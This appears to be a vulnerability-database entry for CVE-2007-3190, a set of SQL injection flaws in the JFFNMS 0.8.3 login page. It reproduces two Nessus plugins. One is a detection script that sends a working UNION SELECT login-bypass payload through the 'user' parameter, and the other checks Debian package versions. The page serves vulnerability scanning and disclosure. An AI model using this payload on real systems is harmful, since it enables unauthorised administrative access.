Vulnerabilities > CVE-2007-3190 - Remote vulnerability in Jffnms Just for FUN Network Management System 0.8.3
Attack vector
NETWORK Attack complexity
MEDIUM Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Multiple SQL injection vulnerabilities in auth.php in Just For Fun Network Management System (JFFNMS) 0.8.3, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) user and (2) pass parameters.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 1 |
Exploit-Db
| description | JFFNMS 0.8.3 auth.php Multiple Parameter SQL Injection. CVE-2007-3190. Webapps exploit for php platform |
| id | EDB-ID:30171 |
| last seen | 2016-02-03 |
| modified | 2007-06-11 |
| published | 2007-06-11 |
| reporter | Tim Brown |
| source | https://www.exploit-db.com/download/30171/ |
| title | JFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection |
Nessus
NASL family CGI abuses NASL id JFFNMS_USER_SQL_INJECTION.NASL description The remote host is running JFFNMS, an open source network management and monitoring system. The version of JFFNMS on the remote host fails to properly sanitize user-supplied input to the last seen 2020-06-01 modified 2020-06-02 plugin id 25461 published 2007-06-12 reporter This script is Copyright (C) 2007-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/25461 title JFFNMS auth.php Multiple Parameter SQL Injection code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(25461); script_version("1.23"); script_cve_id("CVE-2007-3190"); script_bugtraq_id(24414); script_name(english:"JFFNMS auth.php Multiple Parameter SQL Injection"); script_summary(english:"Tries to generate a SQL error"); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a PHP script that is prone to a SQL injection attack." ); script_set_attribute(attribute:"description", value: "The remote host is running JFFNMS, an open source network management and monitoring system. The version of JFFNMS on the remote host fails to properly sanitize user-supplied input to the 'user' parameter before using it in the 'lib/api.classes.inc.php' script in database queries. If PHP's 'magic_quotes_gpc' setting is disabled, an unauthenticated, remote attacker can leverage this issue to launch SQL injection attacks against the affected application, including bypassing authentication and gaining administrative access to it." ); script_set_attribute(attribute:"see_also", value:"https://www.nth-dimension.org.uk/pub/NDSA20070524.txt.asc" ); script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2007/Jun/217" ); script_set_attribute(attribute:"solution", value: "Upgrade to JFFNMS version 0.8.4-pre3 or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2007/06/12"); script_set_attribute(attribute:"vuln_publication_date", value: "2007/06/10"); script_cvs_date("Date: 2018/11/15 20:50:17"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:jffnms:just_for_fun_network_management_system"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc."); script_dependencies("http_version.nasl"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 80); script_require_keys("www/PHP"); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("url_func.inc"); port = get_http_port(default:80, embedded: 0); if (!can_host_php(port:port)) exit(0); # Loop through various directories. if (thorough_tests) dirs = list_uniq(make_list("/jffnms", cgi_dirs())); else dirs = make_list(cgi_dirs()); foreach dir (dirs) { # Try to exploit the SQL injection flaw to bypass authentication. user = string(SCRIPT_NAME, "' UNION SELECT 2,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'--"); pass = ""; w = http_send_recv3(method:"GET", item:string( dir, "/?", "user=", urlencode(str:user), "&", "file=index&", "pass=", pass ), port:port ); if (isnull(w)) exit(1, "The web server on port "+port+" did not answer."); res = strcat(w[0], w[1], '\r\n', w[2]); # If... if ( # the output looks like it's from JFFNMS and... ("jffnms=" >< res || "is part of JFFNMS" >< res) && # we get a link to the admin menu "src='admin/menu.php" >< res ) { security_hole(port); set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE); exit(0); } }NASL family Debian Local Security Checks NASL id DEBIAN_DSA-1374.NASL description Several vulnerabilities have been discovered in jffnms, a web-based Network Management System for IP networks. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2007-3189 Cross-site scripting (XSS) vulnerability in auth.php, which allows a remote attacker to inject arbitrary web script or HTML via the last seen 2020-06-01 modified 2020-06-02 plugin id 26035 published 2007-09-14 reporter This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/26035 title Debian DSA-1374-1 : jffnms - several vulnerabilities code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-1374. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(26035); script_version("1.14"); script_cvs_date("Date: 2019/08/02 13:32:20"); script_cve_id("CVE-2007-3191"); script_xref(name:"DSA", value:"1374"); script_name(english:"Debian DSA-1374-1 : jffnms - several vulnerabilities"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Several vulnerabilities have been discovered in jffnms, a web-based Network Management System for IP networks. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2007-3189 Cross-site scripting (XSS) vulnerability in auth.php, which allows a remote attacker to inject arbitrary web script or HTML via the'user' parameter. - CVE-2007-3190 Multiple SQL injection vulnerabilities in auth.php, which allow remote attackers to execute arbitrary SQL commands via the'user' and 'pass' parameters. - CVE-2007-3192 Direct requests to URLs make it possible for remote attackers to access configuration information, bypassing login restrictions." ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2007-3189" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2007-3190" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2007-3192" ); script_set_attribute( attribute:"see_also", value:"https://www.debian.org/security/2007/dsa-1374" ); script_set_attribute( attribute:"solution", value: "Upgrade the jffnms package. For the stable distribution (etch), these problems have been fixed in version 0.8.3dfsg.1-2.1etch1." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:jffnms"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:4.0"); script_set_attribute(attribute:"patch_publication_date", value:"2007/09/11"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/09/14"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"4.0", prefix:"jffnms", reference:"0.8.3dfsg.1-2.1etch1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");